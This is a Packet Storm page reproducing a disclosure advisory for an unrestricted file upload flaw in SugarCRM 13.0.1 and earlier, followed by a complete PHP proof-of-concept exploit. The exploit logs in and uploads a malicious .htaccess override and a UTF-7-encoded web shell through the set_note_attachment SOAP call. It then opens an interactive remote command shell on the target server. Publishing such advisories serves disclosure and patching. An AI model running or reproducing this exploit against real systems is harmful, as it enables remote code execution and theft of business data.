exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

SugarCRM 13.0.1 Shell Upload

SugarCRM 13.0.1 Shell Upload
Posted Oct 27, 2023
Authored by EgiX | Site karmainsecurity.com

SugarCRM versions 13.0.1 and below suffer from a remote shell upload vulnerability in the set_note_attachment SOAP call.

tags | exploit, remote, shell
SHA-256 | f051a516487d8fd4a224aa9c883a0ab530f400da930805694f2f73cbeae5a487

SugarCRM 13.0.1 Shell Upload

Change Mirror Download
-------------------------------------------------------------------------------
SugarCRM <= 13.0.1 (set_note_attachment) Unrestricted File Upload
Vulnerability
-------------------------------------------------------------------------------


[-] Software Link:

https://www.sugarcrm.com


[-] Affected Versions:

Version 13.0.1 and prior versions.
Version 12.0.3 and prior versions.


[-] Vulnerability Description:

When handling the "set_note_attachment" SOAP call, the application
allows uploading of
any kind of file into /upload/ directory. This one is protected by the
main SugarCRM
.htaccess file, i.e. it doesn't allow access/execution of PHP files.
However, this
behavior can be overridden if the subdirectory contains another
.htaccess file.
So, an attacker can leverage the vulnerability to firstly upload a new
.htaccess
file and then to upload the PHP code they want to execute.


[-] Proof of Concept:

https://karmainsecurity.com/pocs/KIS-2023-11.php

(Packet Storm note: POC included at bottom)

[-] Solution:

Upgrade to version 13.0.2, 12.0.4, or later.


[-] Disclosure Timeline:

[23/04/2023] - Vendor notified
[21/09/2023] - Fixed versions released
[06/10/2023] - CVE identifier requested
[26/10/2023] - Publication of this advisory


[-] CVE Reference:

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has not assigned a CVE identifier for this vulnerability.


[-] Credits:

Vulnerability discovered by Egidio Romano.


[-] Original Advisory:

https://karmainsecurity.com/KIS-2023-11


[-] Other References:

https://support.sugarcrm.com/resources/security/sugarcrm-sa-2023-011/


--- KIS-2023-11.php poc ---


<?php

set_time_limit(0);
error_reporting(E_ERROR);

if (!extension_loaded("curl")) die("[+] cURL extension required!\n");

if ($argc != 4) die("Usage: php $argv[0] <URL> <username> <password>\n");

list($url, $user, $pass) = [$argv[1], $argv[2], $argv[3]];

print "[+] Logging in with username '{$user}' and password '{$pass}'\n";

$ch = curl_init();

$params = ["username" => $user, "password" => $pass, "grant_type" => "password", "client_id" => "sugar"];

curl_setopt($ch, CURLOPT_URL, "{$url}rest/v10/oauth2/token");
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($params));
curl_setopt($ch, CURLOPT_HTTPHEADER, ["Content-Type: application/json"]);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);

if (($token = (json_decode(curl_exec($ch)))->access_token) == null) die("[+] Login failed!\n");

print "[+] Creating new Notes bean (ID: .htaccess)\n";

$note_id = ".htaccess";

curl_setopt($ch, CURLOPT_URL, "{$url}rest/v10/Notes");
curl_setopt($ch, CURLOPT_HTTPHEADER, ["Content-Type: application/json", "OAuth-Token: {$token}"]);
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode(["id" => $note_id]));

if (!preg_match("/$note_id/", curl_exec($ch))) die("[+] Bean creation failed!\n");

print "[+] Creating new Notes bean (ID: sh.php)\n";

$note_id = "sh.php";

curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode(["id" => $note_id]));

if (!preg_match("/$note_id/", curl_exec($ch))) die("[+] Bean creation failed!\n");

require_once("./lib/nusoap.php");
$client = new nusoap_client("{$url}soap.php", false);

if (($err = $client->getError()))
{
echo "\nConstructor error: $err";
echo "\nDebug: " . $client->getDebug() . "\n";
die();
}

print "[+] Sending SOAP login request\n";

$params = ["user_auth" => ["user_name" => $user, "password" => $pass]];
$session = $client->call('login', $params);

if ($session['id'] == -1) die("[+] SOAP login failed!\n");

print "[+] Uploading .htaccess through 'set_note_attachment'\n";

$htaccess = "RewriteEngine on\nRewriteBase /upload\nRewriteRule ^(.*)$ - [L]\nphp_flag zend.multibyte 1\nphp_value zend.script_encoding \"UTF-7\"";
$params = ["session" => $session['id'], "note" => ["id" => ".htaccess", "file" => base64_encode($htaccess)]];

$client->call("set_note_attachment", $params);

print "[+] Uploading shell through 'set_note_attachment'\n";

$shell = "+ADw?php passthru(\$_SERVER['HTTP_CMD']); ?>";
$params = ["session" => $session['id'], "note" => ["id" => "sh.php", "file" => base64_encode($shell)]];

$client->call("set_note_attachment", $params);

print "[+] Launching shell\n";

curl_setopt($ch, CURLOPT_URL, "{$url}upload/sh.php");

while(1)
{
print "\nsugar-shell# ";
if (($cmd = trim(fgets(STDIN))) == "exit") break;
curl_setopt($ch, CURLOPT_HTTPHEADER, ["CMD: ".$cmd]);
($r = curl_exec($ch)) ? print $r : die("\n[+] Exploit failed!\n");
}


Login or Register to add favorites

File Archive:

February 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    16 Files
  • 2
    Feb 2nd
    19 Files
  • 3
    Feb 3rd
    0 Files
  • 4
    Feb 4th
    0 Files
  • 5
    Feb 5th
    24 Files
  • 6
    Feb 6th
    2 Files
  • 7
    Feb 7th
    10 Files
  • 8
    Feb 8th
    25 Files
  • 9
    Feb 9th
    37 Files
  • 10
    Feb 10th
    0 Files
  • 11
    Feb 11th
    0 Files
  • 12
    Feb 12th
    17 Files
  • 13
    Feb 13th
    20 Files
  • 14
    Feb 14th
    25 Files
  • 15
    Feb 15th
    15 Files
  • 16
    Feb 16th
    6 Files
  • 17
    Feb 17th
    0 Files
  • 18
    Feb 18th
    0 Files
  • 19
    Feb 19th
    35 Files
  • 20
    Feb 20th
    25 Files
  • 21
    Feb 21st
    18 Files
  • 22
    Feb 22nd
    15 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    10 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    23 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files
  • 29
    Feb 29th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close